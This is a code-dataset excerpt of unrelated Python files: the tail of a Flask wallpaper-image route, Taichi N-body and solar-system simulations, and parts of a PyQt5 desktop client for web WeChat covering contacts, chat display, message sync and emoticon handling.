new_img.paste(old_img, paste_anchor)
# write txt
log.info(f"done processing image")
font_name = collection_info["font"]
font_path = Path(current_app.root_path) / "static" / "fonts" / f"{font_name}.ttf"
font = ImageFont.truetype(str(font_path), int(new_h * collection_info["font_size"]) )
txt = Image.new('RGBA', new_img.size, (255,255,255,0))
drawer = ImageDraw.Draw(new_img)
drawer.text((new_w // 2, int((new_h - old_h) * 0.85) ),
collection_info["title"],
fill=(0, 0, 0, 255), font=font, anchor="mm")
new_img = Image.alpha_composite(new_img, txt)
log.info(f"saving {cache_key} to cache")
cache[(slug, idx, ratio)] = new_img
log.info(f"cached items: {cache.keys()}, cache id: {id(cache)}")
# ...
image_io = BytesIO()
new_img.save(image_io, format='PNG')
image_io.seek(0)
return send_file(
image_io,
as_attachment=False,
mimetype='image/png'
)
@app.route("/wallpaper/<slug>/<idx>/<ratio>")
def wallpaper_out(slug, idx, ratio):
new_img_url = url_for("wallpaper_img", slug=slug, idx=idx, ratio=ratio)
return render_template("wallpaper_out.html",
new_img_url=new_img_url,
bg_color="rgb(0,0,0)")
@app.route("/kiri/likes")
def kiri_likes_page():
log_ = kiri_likes()
rendered = "".join(
[
f"<p> {_} </p>"
for _ in log_.content
]
)
return rendered
if __name__ == '__main__':
app.run(host="127.0.0.1", port=8080, debug=True)
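    # Hedged usage sketch: with the dev server running, a phone wallpaper for
    # azuki #1 is served by the route above (ratio is height "by" width):
    #   http://127.0.0.1:8080/wallpaper/azuki/1/16by9/img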
``` |
{
"source": "0xzhang/Barnes-Hut-Simulation",
"score": 3
} |
#### File: 0xzhang/Barnes-Hut-Simulation/nbody_naive.py
```python
import math
import taichi as ti
import numpy as np
from body import Body
ti.init(arch=ti.cpu)
# number of planets
N = 100
# galaxy size
galaxy_size = 0.2
# time-step size
h = 1e-4
# substepping
substepping = 1
dt = h / substepping
# center of the screen
center = ti.Vector.field(2, ti.f32, ())
center[None] = [0.5, 0.5]
# pos, vel and force of the planets
pos = ti.Vector.field(2, ti.f32, N)
vel = ti.Vector.field(2, ti.f32, N)
bodies = []
# init pos and vel
@ti.kernel
def ti_init():
# init vel
init_vel = 120
for i in range(N):
theta = ti.random() * 2 * math.pi
r = (ti.sqrt(ti.random()) * 0.6 + 0.4) * galaxy_size
offset = r * ti.Vector([ti.cos(theta), ti.sin(theta)])
pos[i] = center[None] + offset
vel[i] = [-offset.y, offset.x]
vel[i] *= init_vel
# init bodies list
def init():
ti_init()
p = pos.to_numpy()
v = vel.to_numpy()
for i in range(N):
bodies.append(Body(1, p[i], v[i]))
def step():
    for i in range(substepping):
        # n^2
        # for body in bodies:
        #     body.reset_force()
        #     for other in bodies:
        #         body.add_force(other)
        #     body.update(dt)

        # 1/2 n^2
        # Action equals minus reaction (Newton's third law), so each unordered
        # pair is computed only once. All forces must be reset before the pair
        # loop: resetting inside it would wipe contributions already
        # accumulated from earlier pairs.
        for body in bodies:
            body.reset_force()
        for bi in range(len(bodies)):
            for bj in range(bi + 1, len(bodies)):
                df = bodies[bi].ret_force(bodies[bj])
                bodies[bi].update_force(df)
                bodies[bj].update_force(-df)
        for body in bodies:
            body.update(dt)
def display(gui):
for body in bodies:
body.display(gui)
gui.show()
def main():
ui = True
init()
if ui:
gui = ti.GUI('N-body naive simulation', (800, 800))
pause = False
while gui.running:
for e in gui.get_events(ti.GUI.PRESS):
if e.key in [ti.GUI.ESCAPE, ti.GUI.EXIT]:
exit()
elif e.key == 'r':
init()
elif e.key == ti.GUI.SPACE:
pause = not pause
if not pause:
step()
display(gui)
else:
while True:
step()
if __name__ == "__main__":
main()
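    # Hedged note: the pairwise loop in step() is O(N^2) per substep in pure
    # Python; judging by the repo name, the Barnes-Hut tree version is the
    # intended path for larger N.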
``` |
{
"source": "0xzhang/taichi-play",
"score": 3
} |
#### File: taichi-play/solar_system/solar_system.py
```python
import taichi as ti
from datetime import datetime, timedelta
# Length of Year
# Tricky: I use many small spheres(call `scene.particles()``)
# to represent the orbit of planets.
# If dt is too small, 8000 may not enough, the orbit will be an arc.
LOY = 8000
@ti.data_oriented
class CelestialObject:
def __init__(self, radius, dim=3):
self.radius = radius
self.dim = dim
self.color = ti.Vector.field(dim, ti.f32, shape=1)
self.pos = ti.Vector.field(dim, ti.f32, shape=1)
def display(self, scene):
scene.particles(self.pos, self.radius, per_vertex_color=self.color)
@ti.data_oriented
class Sun(CelestialObject):
@ti.kernel
def initialize(self, color: ti.template()):
self.color[0] = color
self.pos[0].fill(0.0)
@ti.data_oriented
class Planet(CelestialObject):
def __init__(self, radius, dim=3):
super().__init__(radius)
self.vel = ti.Vector.field(dim, ti.f32, shape=1)
self.orbit = ti.Vector.field(dim, ti.f32, shape=LOY)
self.orbit_colors = ti.Vector.field(dim, ti.f32, shape=LOY)
self.orbit_radius = self.radius / 8
@ti.kernel
def initialize(self, color: ti.template(), pos: ti.template(),
vel: ti.template()):
self.color[0] = color
self.pos[0] = pos
self.vel[0] = vel
self.orbit[0] = pos
for i in range(LOY):
self.orbit_colors[i] = color
@ti.kernel
def update(self, dt: ti.f32, step: ti.i32):
self.pos[0] += self.vel[0] * dt
sqr_sum = self.pos[0].norm_sqr()
# in units of AU/day^2
acc = -2.959e-4 * self.pos[0] / sqr_sum**(3. / 2)
self.vel[0] += acc * dt
self.orbit[step % LOY] = self.pos[0]
def ghost(self, scene):
scene.particles(self.orbit,
self.orbit_radius,
per_vertex_color=self.orbit_colors)
@ti.data_oriented
class SolarSystem:
def __init__(self, sun):
self.sun = sun
self.planets = []
self.date = None
self.step = 0
self.time = 0.0
def add_planet(self, planet):
self.planets.append(planet)
def update(self, dt=1):
self.step = (self.step + 1) % LOY
self.time += dt
        for p in self.planets:
            p.update(dt, self.step)
def display(self, scene):
self.sun.display(scene)
for p in self.planets:
p.display(scene)
p.ghost(scene)
def get_date(self):
date = self.date + timedelta(int(self.time))
return date.isoformat()
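
# Hedged usage sketch (a real driver would also call sun.initialize/
# planet.initialize with taichi vectors and render through ti.ui):
#   sun = Sun(radius=0.1)
#   earth = Planet(radius=0.02)
#   system = SolarSystem(sun)
#   system.add_planet(earth)
#   system.date = datetime(2021, 1, 1)
#   for _ in range(LOY):
#       system.update(dt=1.0)
#   print(system.get_date())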
``` |
{
"source": "0xzhaohx/wechat-qt5",
"score": 2
} |
#### File: core/messages/messagemanager.py
```python
class MessageManager(object):
def __init__(self):
pass
def save_message(self, message):
pass
def fetch_messages(self,user_name):
pass
```
#### File: wechat/tool/wechathelper.py
```python
class WechatHelper(object):
'''
classdocs
'''
def __init__(self, params):
'''
Constructor
'''
    def isPicture(self, path):
        if not path:
            return False
        if path.endswith("jpg") or path.endswith("jpeg") or path.endswith("png"):
            return True
        return False
```
#### File: wechat/ui/about.py
```python
from PyQt5.Qt import Qt
from PyQt5.QtWidgets import QVBoxLayout,QDialog,QLabel
from PyQt5.QtCore import QSize
def __unicode(s):
    return s
class About(QDialog):
WIDTH = 460
HEIGHT = 300
def __init__(self,parent=None):
super(About,self).__init__(parent)
#super(About,self).setWindowFlags(QtCore.Qt.Popup)
self.setModal(True)
self.resize(QSize(About.WIDTH,About.HEIGHT))
self.setWindowTitle(__unicode("關於"))
self.about_initial()
def about_initial(self):
#
mainLayout=QVBoxLayout()
label = QLabel("v0.6")
label.setAlignment(Qt.AlignHCenter)
mainLayout.addWidget(label)
#mainLayout.addWidget(self.emotion_table)
self.setLayout(mainLayout)
```
#### File: ox11/wechat/wechatwin.py
```python
__date__ = '2018-03-25'
'''
import sip
sip.setapi('QString', 1)
sip.setapi('QVariant', 1)
'''
import sys
import os
import threading
import re
from time import sleep
import time
from com.ox11.wechat import property
from msg import Msg
from com.ox11.wechat.ui.emotion import Emotion
from com.ox11.wechat.ui.MemberListWidget import MemberListWidget
from com.ox11.wechat.ui.about import About
from com.ox11.wechat.ui.delegate.labeldelegate import LabelDelegate
from config import WechatConfig
import wechatutil
import xml.dom.minidom
import json
import logging
from PyQt5.QtGui import QIcon, QCursor, QTextImageFormat,QStandardItemModel
from PyQt5.QtWidgets import QLabel,QDialog,QFileDialog,QMenu,QVBoxLayout,QAction,QMainWindow
from PyQt5 import QtGui, uic
from PyQt5.QtCore import QSize, pyqtSlot, pyqtSignal, QPoint
'''
reload(sys)
sys.setdefaultencoding('utf-8')
'''
qtCreatorFile = "resource/ui/wechatwin-0.5.ui"
WeChatWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)
class WeChatWin(QMainWindow, WeChatWindow):
I18N = "resource/i18n/resource.properties"
EMOTION_DIR = "./resource/expression"
MESSAGE_TEMPLATE = "./resource/messages.html"
LOG_FORMAT = '%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s'
'''
webwx_init
->webwxstatusnotify()
->(webwx_geticon|webwx_batch_getheadimg)
->webwx_getcontact
->first call webwx_batch_getcontact
->(webwx_geticon|webwx_batch_getheadimg)
->second call webwx_batch_getcontact
'''
initialed = pyqtSignal()
messageReceived = pyqtSignal(str)
def __init__(self,wechatweb,qApp):
QMainWindow.__init__(self)
WeChatWindow.__init__(self)
self.setAcceptDrops(True)
self.config = WechatConfig()
logging.basicConfig(filename='%s/wechat.log'%self.config.getAppHome(),level=logging.DEBUG,format=WeChatWin.LOG_FORMAT)
self.default_head_icon = './resource/images/default.png'
self.current_chat_contact = None
self.messages_pool = {}
#没有來得及處理的新消息,主要用於存放UI未初始化完時收到消息,然後等初始結束處理
self.blocked_messages_pool = []
self.prepare4Environment()
self.wechatweb = wechatweb
self.qApp=qApp
self.setupUi(self)
self.setWindowIcon(QIcon("resource/icons/hicolor/32x32/apps/wechat.png"))
self.chatsModel = QStandardItemModel(0,4)
self.friendsModel = QStandardItemModel(0,3)
self.publicModel = QStandardItemModel()
#connect the slot before #wxinitial()
self.messageReceived.connect(self.webwx_sync_process)
#initial messages
#should initial before chat item click
ap = os.path.abspath(WeChatWin.MESSAGE_TEMPLATE)
#self.messages.load(QUrl.fromLocalFile(ap))
#self.messages.loadFinished.connect(self.loadFinished)
#after initial model,do login
self.wechatweb.login()
self.wxinitial()
#self.synct = WeChatSync(self.wechatweb)
#self.synct.start()
timer = threading.Timer(5, self.synccheck)
timer.setDaemon(True)
timer.start()
self.memberListWidget = None
self.showImageDialog = None
self.friendsWidget.setVisible(False)
self.publicWidget.setVisible(False)
self.profileWidget.setVisible(False)
self.init_chat_contacts()
self.init_friends()
self.init_public()
self.emotionscodeinitial()
self.initialed.connect(self.process_blocked_messages)
self.chatAreaWidget.setVisible(False)
self.chatsWidget.setItemDelegate(LabelDelegate())
self.chatsWidget.setIconSize(QSize(45,45))
self.chatsWidget.setModel(self.chatsModel)
self.chatsWidget.selectionModel().selectionChanged.connect(self.chat_item_clicked)
self.chatsWidget.setColumnHidden(0,True)
self.chatsWidget.setColumnHidden(3,True)
self.chatsWidget.setColumnWidth(1, 70);
self.chatsWidget.setColumnWidth(3, 30);
#self.chatsWidget.horizontalHeader().setStretchLastSection(True)
self.friendsWidget.setModel(self.friendsModel)
self.friendsWidget.setIconSize(QSize(45,45))
##self.friendsWidget.selectionModel().selectionChanged.connect(self.member_item_clicked)
self.friendsWidget.setColumnHidden(0,True)
self.friendsWidget.setColumnWidth(1, 70);
self.friendsWidget.setColumnWidth(3, 30);
self.publicWidget.setModel(self.publicModel)
self.chatButton.clicked.connect(self.switch_chat)
self.friendButton.clicked.connect(self.switch_friend)
self.sendButton.clicked.connect(self.send_msg)
self.pushButton.clicked.connect(self.to_chat)
self.emotionButton.clicked.connect(self.select_emotion)
self.selectImageFileButton.clicked.connect(self.select_document)
self.currentChatUser.clicked.connect(self.current_chat_user_click)
self.showMemberButton.clicked.connect(self.showMembers)
self.addMenu4SendButton()
self.addMenu4SettingButton()
#
self.initialed.emit()
@pyqtSlot()
def loadFinished(self):
print('loadFinished')
self.messages.page().mainFrame().addToJavaScriptWindowObject("Wechat", self)
@pyqtSlot(str)
def showImage(self,image):
if self.showImageDialog:
print(image)
self.showImageDialog.show()
else:
self.showImageDialog = QDialog(self)
#self.showImageDialog.setModal(True)
mainLayout = QVBoxLayout()
image_label = QLabel()
s_image = QtGui.QImage()
            user_icon = self.config.getContactHeadHome() + self.wechatweb.getUser()['UserName'] + ".jpg"
if s_image.load(user_icon):
image_label.setPixmap(QtGui.QPixmap.fromImage(s_image))
mainLayout.addWidget(image_label)
self.showImageDialog.setLayout(mainLayout)
self.showImageDialog.show()
@pyqtSlot(str)
def getSelectedUsers(self,users):
        '''
        Create a group chat from the selected users.
        '''
if not users:
return
#dictt = json.loads(str(users))
user_list = str(users).split(";")
member_list = []
for s_user in user_list:
if len(s_user) > 1:
user = {}
user['UserName']=s_user
member_list.append(user)
user = {}
user['UserName']=self.current_chat_contact["UserName"]
member_list.append(user)
response_data = self.wechatweb.webwx_create_chatroom(member_list)
print("webwx_create_chatroom response:%s"%response_data)
data_dict = json.loads(response_data)
if data_dict["BaseResponse"]["Ret"] == 0:
chat_room_name = data_dict["ChatRoomName"]
data = {
'Count': 1,
'List': [{"UserName":chat_room_name,"ChatRoomId":""}]
}
batch_response = self.wechatweb.webwx_batch_get_contact(data)
if batch_response['Count'] and batch_response['Count'] > 0:
new_contact = batch_response['ContactList'][0]
remark_name = ("%s,%s,%s")%(self.wechatweb.getUser()["NickName"],self.current_chat_contact["NickName"],"")
new_contact["RemarkName"]=remark_name
self.wechatweb.appendFriend(new_contact)
self.wechatweb.webwx_get_head_img(new_contact["UserName"], new_contact["HeadImgUrl"])
self.append_contact_row(new_contact,self.chatsModel,action="INSERT",row=0)
@pyqtSlot(str)
def get_select_emotion(self,emotion):
cursor = self.draft.textCursor()
imageFormat =QTextImageFormat();
imageFormat.setName(os.path.join(Emotion.EMOTION_DIR,str(emotion)));
cursor.insertImage(imageFormat)
'''
self.draft.moveCursor(QTextCursor.End)
self.draft.append("<img src=%s>"%(os.path.join(Emotion.EMOTION_DIR,str(emotion))))
'''
@pyqtSlot(str)
def webwx_sync_process(self, data):
        '''
        @param data
        MSGTYPE:
        MSGTYPE_TEXT: 1, text message
        MSGTYPE_IMAGE: 3, image message
        MSGTYPE_VOICE: 34, voice message
        37, friend-request confirmation
        MSGTYPE_VIDEO: 43,
        MSGTYPE_MICROVIDEO: 62,
        MSGTYPE_EMOTICON: 47,
        MSGTYPE_APP: 49,
        MSGTYPE_VOIPMSG: 50,
        51, WeChat initialization message
        MSGTYPE_VOIPNOTIFY: 52,
        MSGTYPE_VOIPINVITE: 53,
        MSGTYPE_LOCATION: 48,
        MSGTYPE_STATUSNOTIFY: 51,
        MSGTYPE_SYSNOTICE: 9999,
        MSGTYPE_POSSIBLEFRIEND_MSG: 40,
        MSGTYPE_VERIFYMSG: 37,
        MSGTYPE_SHARECARD: 42,
        MSGTYPE_SYS: 10000,
        MSGTYPE_RECALLED: 10002, // recalled message
        '''
if not data:
return False
data = json.loads(str(data), object_hook=wechatutil.decode_data)
ret_code = data['BaseResponse']['Ret']
if ret_code == 0:
pass
else:
return False
add_msg_count = data['AddMsgCount']
if add_msg_count == 0:
return True
messages = data['AddMsgList']
for message in messages:
self.msg_handle(message)
def process_blocked_messages(self):
logging.debug('start process blocked_messages_pool')
for message in self.blocked_messages_pool:
self.msg_handle(message)
def wxinitial(self):
wx_init_response = self.wechatweb.webwx_init()
#self.wechatweb.webwxstatusnotify()
self.setupwxuser()
#do downlaod icon
self.wechatweb.webwx_get_contact()
self.synccheck(loop=False)
#TODO download the head image or icon of contact
#fetch the icon or head image that init api response
groups = []
for contact in wx_init_response['ContactList']:
user_name = contact['UserName']
head_img_url = contact['HeadImgUrl']
if not user_name or not head_img_url:
continue
if self.isChatRoom(user_name):
#prepare arguments for batch_get_contact
group = {}
group['UserName'] = contact['UserName']
group['ChatRoomId'] = ''
groups.append(group)
#doanload head image
##self.wechatweb.webwx_get_head_img(user_name,head_img_url)
elif user_name.startswith('@'):
##self.wechatweb.webwx_get_icon(user_name,head_img_url)
pass
else:
pass
params = {
'Count': len(groups),
'List': groups
}
self.batch_get_contact(data=params)
def addMenu4SendButton(self):
menu = QMenu()
enterAction = QAction(wechatutil.unicode("按Enter發送消息"),self)
menu.addAction(enterAction)
self.sendSetButton.setMenu(menu)
def addMenu4SettingButton(self):
menu = QMenu()
createChatRoorAction = QAction(wechatutil.unicode("開始聊天"),self)
menu.addAction(createChatRoorAction)
notifySwitchAction = QAction(wechatutil.unicode("關閉通知"),self)
menu.addAction(notifySwitchAction)
soundSwitchAction = QAction(wechatutil.unicode("關閉聲音"),self)
menu.addAction(soundSwitchAction)
logoutAction = QAction(wechatutil.unicode("退出"),self)
menu.addAction(logoutAction)
aboutAction = QAction(wechatutil.unicode("關於"),self)
menu.addAction(aboutAction)
self.settingButton.setMenu(menu)
aboutAction.triggered.connect(self.showAbout)
logoutAction.triggered.connect(self.do_logout)
def showAbout(self):
about = About(self)
about.show()
def emotionscodeinitial(self):
self.emotionscode = property.parse(WeChatWin.I18N).properties or {}
def relogin(self):
print("relogin..............")
self.qApp.exit(888)
def do_logout(self):
self.relogin()
'''
print("logout..............")
sys.exit(0)
'''
def batch_get_contact(self,data=None):
params = data
response = self.wechatweb.webwx_batch_get_contact(params)
        '''
        The contacts in session_response include chat-room members, so update chat_contact:
        if response['Count'] and response['Count'] > 0:
            session_list = response['ContactList']
            for x in session_list:
                for i,ss in enumerate(self.wechatweb.getChatContacts()):
                    if ss["UserName"] == x["UserName"]:
                        self.wechatweb.update_chat_contact(i,x)
                        break
        '''
for contact in response['ContactList']:
user_name = contact['UserName']
head_img_url = contact['HeadImgUrl']
if not user_name or not head_img_url:
continue
            image = '%s\\heads\\contact\\%s.jpg' % (self.config.getAppHome(), user_name)
            # download the chat room head image if we don't have it yet
            if not os.path.exists(image):
                self.wechatweb.webwx_get_head_img(user_name, head_img_url)
            else:
                logging.warning("%s already exists" % image)
            # if the group has no name, use the first two member names combined as its name
            t_names = []
            if not contact["NickName"] and not contact["DisplayName"]:
                for _member in contact["MemberList"][:2]:
                    t_names.append(_member['DisplayName'] or _member['NickName'])
                contact["DisplayName"] = "、".join(t_names)
            # add the chat room to the friends list if it is not there yet
            exist = False
            for member in self.wechatweb.getFriends():
                if contact["UserName"] == member["UserName"]:
                    exist = True
                    if not member["NickName"] and not member["DisplayName"] and t_names:
                        member["DisplayName"] = "、".join(t_names)
                    break
if exist is False:
self.wechatweb.appendFriend(contact)
            # update chat_contact so its group member list is populated
for i,chat_contact in enumerate(self.wechatweb.getChatContacts()):
if contact["UserName"] == chat_contact["UserName"]:
self.wechatweb.update_chat_contact(i,contact)
break
return response
def prepare4Environment(self):
if os.path.exists(self.config.customFace):
self.__remove()
else:
os.makedirs(self.config.customFace)
def __remove(self):
        '''
        Delete the downloaded avatar files.
        '''
for i in os.listdir(self.config.customFace):
head_icon = os.path.join(self.config.customFace,i)
if os.path.isfile(head_icon):
os.remove(head_icon)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.acceptProposedAction()
print("dragEnterEvent")
def dragMoveEvent(self, event):
print("dragMoveEvent")
def isImage(self,path):
if not path:
return False
if path.endswith("jpg") or path.endswith("jpeg") or path.endswith("png"):
return True
def dropEvent(self, event):
#print("dropEvent")
if event.mimeData().hasUrls():
            # iterate over every file path dragged into the window
for url in event.mimeData().urls():
file_name = str(url.toLocalFile())
if self.isImage(file_name):
self.draft.append("<img src=%s width=80 height=80>"%(file_name))
event.acceptProposedAction()
else:
#super(Button,self).dropEvent(event)
pass
    def load_image(self, img_path, use_default=True):
        image = QtGui.QImage()
        if image.load(img_path):
            return image
        if use_default and image.load(self.config.getDefaultIcon()):
            return image
def setupwxuser(self):
user = self.wechatweb.getUser()
nickName = user['NickName']
self.userNameLabel.setText(wechatutil.unicode(nickName))
user_icon = "%s\\%s.jpg"%(self.config.customFace,user['UserName'] )
user_head_image = QtGui.QImage()
if user_head_image.load(user_icon):
self.headImageLabel.setPixmap(QtGui.QPixmap.fromImage(user_head_image).scaled(40, 40))
else:
if user_head_image.load(self.config.getDefaultIcon()):
self.headImageLabel.setPixmap(QtGui.QPixmap.fromImage(user_head_image).scaled(40, 40))
def code_emotion(self,msg):
imagePattern=re.compile(r'src="([.*\S]*\.gif)"',re.I)
ppattern = re.compile(r'<p style=".*\S">(.+?)</p>', re.I)
pimages = []
ps = ppattern.findall(msg)
for p in ps:
pimage = {}
pimage["p"]=p
images = imagePattern.findall(p,re.I)
for image in images:
#print("emotion:%s"%image)
for key,emotioncode in self.emotionscode.items():
epath = os.path.join(WeChatWin.EMOTION_DIR,("%s.gif")%key)
imagemark = ('<img src="%s" />')%(epath)
if image ==epath:
#print('[%s]'%((code_emotion)))
pcode = p.replace(imagemark,'[%s]'%(wechatutil.unicode(emotioncode)))
#print("p coded:%s"%pcode)
pimage["p"]=pcode
break
pimage["images"]=images
pimages.append(pimage)
return pimages
def decode_emotion(self,msg):
pattern =re.compile(u"\[[\u4e00-\u9fa5]{1,3}\]")
result=re.findall(pattern,msg)
for emotion in result:
#print emotion
for key,val in self.emotionscode.items():
if emotion ==("[%s]")%(val):
epath = os.path.join(WeChatWin.EMOTION_DIR,("%s.gif")%key)
msg = msg.replace(emotion,("<img src=%s>")%(epath))
break
return msg
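
    # Hedged round-trip sketch (the "100" -> "微笑" mapping is hypothetical;
    # the real codes come from resource/i18n/resource.properties):
    #   decode_emotion('hi [微笑]') -> 'hi <img src=./resource/expression/100.gif>'
    #   code_emotion(...) performs the reverse when sending a draft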
def append_chat_contact(self,chat_contact,action="APPEND",row=None):
        '''
        :param action: APPEND or INSERT; APPEND is the default
        '''
###############
cells = []
# user name item
user_name = chat_contact['UserName']
user_name_cell = QtGui.QStandardItem(wechatutil.unicode(user_name))
cells.append(user_name_cell)
user_head_icon = "%s\\%s.jpg"%(self.config.customFace,user_name)
item = QtGui.QStandardItem(QIcon(user_head_icon),"")
cells.append(item)
dn = chat_contact['DisplayName'] or chat_contact['RemarkName'] or chat_contact['NickName']
#if not dn:
#dn = contact['NickName']
# user remark or nick name
remark_nick_name_item = QtGui.QStandardItem(wechatutil.unicode(dn))
cells.append(remark_nick_name_item)
#
tips_count_item = QtGui.QStandardItem()
cells.append(tips_count_item)
if "APPEND" == action:
self.chatsModel.appendRow(cells)
elif "INSERT" == action and row >= 0:
self.chatsModel.insertRow(row,cells)
else:
self.chatsModel.appendRow(cells)
def append_friend(self,contact,action="APPEND",row=None):
        '''
        :param action: APPEND or INSERT; APPEND is the default
        '''
###############
cells = []
# user name item
user_name = contact['UserName']
user_name_item = QtGui.QStandardItem(wechatutil.unicode(user_name))
cells.append(user_name_item)
user_head_icon = "%s\\%s.jpg"%(self.config.customFace, user_name)
item = QtGui.QStandardItem(QIcon(user_head_icon),"")
cells.append(item)
_name = contact['DisplayName'] or contact['RemarkName'] or contact['NickName']
#if not dn:
#dn = contact['NickName']
# user remark or nick name
_name_item = QtGui.QStandardItem(wechatutil.unicode(_name))
cells.append(_name_item)
#
if "APPEND" == action:
self.friendsModel.appendRow(cells)
elif "INSERT" == action and row >= 0:
self.friendsModel.insertRow(row,cells)
else:
self.friendsModel.appendRow(cells)
def messages_clear(self):
#ap = os.path.abspath(WeChatWin.MESSAGE_TEMPLATE)
#self.messages.load(QUrl.fromLocalFile(ap))
#self.messages.page().mainFrame().evaluateJavaScript("clearr();")
self.messages.setText("")
pass
def init_chat_contacts(self):
'''
contact table (5 columns)
column 1:user name(will be hidden)
column 2:head icon
column 3:remark or nick name
column 4:message count tips(will be hidden)
:return:
'''
#self.chatsWidget.setColumnCount(4)
''''''
for chat_contact in self.wechatweb.getChatContacts():
self.append_chat_contact(chat_contact)
'''
for session in sorted([x for x in self.wechatweb.friend_list if x["AttrStatus"] and x["AttrStatus"] > 0],key=lambda ct: ct["AttrStatus"],reverse=True):
exist = False
for contact in self.wechatweb.chat_list:
if contact["UserName"] == session["UserName"]:
exist = True
if not exist:
self.append_contact_row(session,self.chatsModel)
'''
#self.chatsWidget.clicked.connect(self.chat_item_clicked)
def init_friends(self):
''''''
#self.friendsModel.setColumnHidden(0,True)
        '''
        To hide the row numbers (Qt C++ equivalent):
            QHeaderView *headerView = table->verticalHeader();
            headerView->setHidden(true);
        '''
self.friendsWidget.setColumnHidden(1,True)
group_contact_list = []
for member in self.wechatweb.getFriends():
group_contact_list.append(member)
group_contact_list.sort(key=lambda mm: mm['RemarkPYInitial'] or mm['PYInitial'])
#group_contact_list.sort(key=lambda mm: mm['RemarkPYQuanPin'] or mm['PYQuanPin'])
for member in group_contact_list:#.sort(key=lambda m: m['PYInitial'])
self.append_friend(member)
self.friendsWidget.clicked.connect(self.member_item_clicked)
def init_public(self):
pass
#self.readerListWidget.addItem("readers")
#self.readerListWidget.clicked.connect(self.contact_cell_clicked)
def switch_chat(self,show=False):
current_row =self.chatsWidget.currentIndex().row()
if current_row > 0 or show:
self.chatAreaWidget.setVisible(True)
self.label.setVisible(False)
else:
self.chatAreaWidget.setVisible(False)
self.label.setVisible(True)
self.chatsWidget.setVisible(True)
self.friendsWidget.setVisible(False)
self.profileWidget.setVisible(False)
def public_button_clicked(self):
self.friendsWidget.setVisible(False)
self.chatsWidget.setVisible(False)
self.publicWidget.setVisible(True)
def switch_friend(self):
current_row =self.friendsWidget.currentIndex().row()
if current_row > 0:
self.label.setVisible(False)
self.profileWidget.setVisible(True)
else:
self.label.setVisible(True)
self.profileWidget.setVisible(False)
self.friendsWidget.setVisible(True)
self.chatsWidget.setVisible(False)
self.chatAreaWidget.setVisible(False)
def get_contact(self,user_name):
return self.get_member(user_name)
def get_member(self,user_name):
for member in self.wechatweb.getChatContacts():
if user_name == member['UserName']:
return member
for member in self.wechatweb.getFriends():
if user_name == member['UserName']:
return member
def chat_item_clicked(self):
if self.chatAreaWidget.isHidden():
self.chatAreaWidget.setVisible(True)
self.label.setVisible(False)
if self.current_chat_contact:
self.messages_clear()
current_row = self.chatsWidget.currentIndex().row()
user_name_cell_index = self.chatsModel.index(current_row,0)
user_name_cell = self.chatsModel.data(user_name_cell_index)
tip_index = self.chatsModel.index(current_row,3)
tips_item = self.chatsModel.data(tip_index)
if tips_item:
self.chatsModel.setData(tip_index, "")
head_tips_index = self.chatsModel.index(current_row,0)
tips_item = self.chatsModel.data(head_tips_index)
#if message_count:
# count = int(message_count)
#TODO
user_name = user_name_cell
print("current click user is %s"%user_name)
if self.isChatRoom(user_name):
contact = self.get_member(user_name)
else:
contact = self.get_contact(user_name)
self.current_chat_contact = contact
dn = contact['DisplayName'] or contact['RemarkName'] or contact['NickName']
#if not dn:
# dn = contact['NickName']
if self.isChatRoom(user_name):
self.currentChatUser.setText(("%s (%d)")%(wechatutil.unicode(dn),contact["MemberCount"]))
else:
self.currentChatUser.setText(wechatutil.unicode(dn))
#self.messages_clear()
#self.messages.setText('')
self.draft.setText('')
cached_messages = self.messages_pool.get(user_name) or []
#for (key,messages_list) in self.msg_cache.items():
#for (key,messages_list) in msgss:
#if user_name == key:
for message in cached_messages:
msg_type = message['MsgType']
if msg_type:
if msg_type == 2 or msg_type == 51 or msg_type == 52:
continue
if msg_type == 1:
self.text_msg_handler(message)
elif msg_type == 3:
self.image_msg_handler(message)
elif msg_type == 34:
self.voice_msg_handler(message)
elif msg_type == 49:
self.app_msg_handler(message)
elif msg_type == 10002:
self.sys_msg_handler(message)
elif msg_type == 10000:
self.default_msg_handler(message)
else:
self.default_msg_handler(message)
#break
def showMembers(self):
self.current_chat_user_click()
def current_chat_user_click(self):
memebers = [self.current_chat_contact]
if self.current_chat_contact['UserName'].find('@@') >= 0:
memebers = self.current_chat_contact["MemberList"]
if self.memberListWidget:
#print("visible ddd%s:"+str(self.memberListWidget.isHidden()))
if self.memberListWidget.isHidden():
rect = self.geometry()
#update memberlist
self.memberListWidget.updatemembers(memebers)
self.memberListWidget.resize(QSize(MemberListWidget.WIDTH,rect.height()+self.frameGeometry().height()-self.geometry().height()))
self.memberListWidget.move(self.frameGeometry().x()+self.frameGeometry().width(), self.frameGeometry().y())
self.memberListWidget.show()
else:
self.memberListWidget.hide()
else:
rect = self.geometry()
print(rect.left(), rect.top())
print(self.frameGeometry())
print(rect.width(), rect.height())
self.memberListWidget = MemberListWidget(memebers,self.wechatweb.getFriends(),self)
self.memberListWidget.resize(QSize(MemberListWidget.WIDTH,rect.height()+self.frameGeometry().height()-self.geometry().height()))
self.memberListWidget.move(self.frameGeometry().x()+self.frameGeometry().width(), self.frameGeometry().y())
self.memberListWidget.membersChanged.connect(self.getSelectedUsers)
self.memberListWidget.show()
def member_item_clicked(self):
self.profileWidget.setVisible(True)
self.chatAreaWidget.setVisible(False)
self.label.setVisible(False)
current_row =self.friendsWidget.currentIndex().row()
user_name_index = self.friendsModel.index(current_row,0)
user_name_o = self.friendsModel.data(user_name_index)
'''python2
user_name = user_name_o.toString()
'''
user_name = user_name_o
contact = self.get_member(user_name)
self.user_name_label.setVisible(False)
self.user_name_label.setText(user_name)
if contact:
#user_icon = self.config.getContactHeadHome() + contact['UserName'] + ".jpg"
user_icon = "%s\\%s.jpg"%(self.config.customFace, contact['UserName'])
user_head_image = QtGui.QImage()
if user_head_image.load(user_icon):
self.avater_label.setPixmap(QtGui.QPixmap.fromImage(user_head_image).scaled(132, 132))
else:
if user_head_image.load(self.config.getDefaultIcon()):
self.avater_label.setPixmap(QtGui.QPixmap.fromImage(user_head_image).scaled(132, 132))
self.nickname_label.setText(wechatutil.unicode(contact['NickName']))
print(contact['Signature'])
if 'Signature' in contact:
print(contact['Signature'])
self.signature_label.setText(wechatutil.unicode(contact['Signature']) if ('Signature' in contact) else "")
self.remark_label.setText(wechatutil.unicode(contact['RemarkName']))
self.province_label.setText(wechatutil.unicode(contact['RemarkName']))
'''
self.current_chat_contact = contact
dn = contact['RemarkName'] or contact['NickName']
if not dn:
